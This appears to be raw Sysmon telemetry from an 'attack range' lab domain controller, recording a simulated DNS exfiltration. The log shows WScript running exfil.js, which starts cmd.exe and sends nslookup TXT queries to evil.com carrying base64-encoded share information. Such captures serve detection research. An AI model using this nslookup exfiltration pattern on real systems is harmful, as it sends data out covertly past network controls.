14:21:24.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.872{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9F42-000000005F02}3620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.872{2E1864BB-18E4-629A-9D42-000000005F02}59566688C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-9F42-000000005F02}3620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.886{2E1864BB-18E4-629A-9F42-000000005F02}3620C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-9D42-000000005F02}5956C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsrtt.tmp 2>&1 10341000x8000000000000000206431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.872{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9E42-000000005F02}6224C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.872{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9E42-000000005F02}6224C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.867{2E1864BB-18E4-629A-9E42-000000005F02}62246324C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9D42-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.866{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=070A54B257FB2FF39FD90C4FD01D005C,SHA256=E0AB788F99401B2F104B26C12345AA0A7F5B10AF2451D9917C624385BADF97F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.850{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9E42-000000005F02}6224C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.850{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9D42-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.850{2E1864BB-18E0-629A-6742-000000005F02}39764708C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-9D42-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000044792Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:21.805{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52383-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 154100x8000000000000000206420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.851{2E1864BB-18E4-629A-9D42-000000005F02}5956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsrtt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.834{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldkk.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.819{2E1864BB-18E4-629A-9B42-000000005F02}12165932C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9C42-000000005F02}8124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.819{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.819{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.819{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.803{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9C42-000000005F02}8124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.803{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.803{2E1864BB-18E4-629A-9A42-000000005F02}4556884C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-9C42-000000005F02}8124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000206411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.910{00000000-0000-0000-0000-000000000000}7712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.838{00000000-0000-0000-0000-000000000000}6160evil.com0::ffff:127.0.0.1;<unknown process> 154100x8000000000000000206409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.818{2E1864BB-18E4-629A-9C42-000000005F02}8124C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-9A42-000000005F02}4556C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldkk.tmp 2>&1 22542200x8000000000000000206408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.725{00000000-0000-0000-0000-000000000000}7708evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.561{00000000-0000-0000-0000-000000000000}5352evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.859{00000000-0000-0000-0000-000000000000}3588evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.708{00000000-0000-0000-0000-000000000000}4928evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.502{00000000-0000-0000-0000-000000000000}1660evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.389{00000000-0000-0000-0000-000000000000}5836evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000206402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.803{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9B42-000000005F02}1216C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 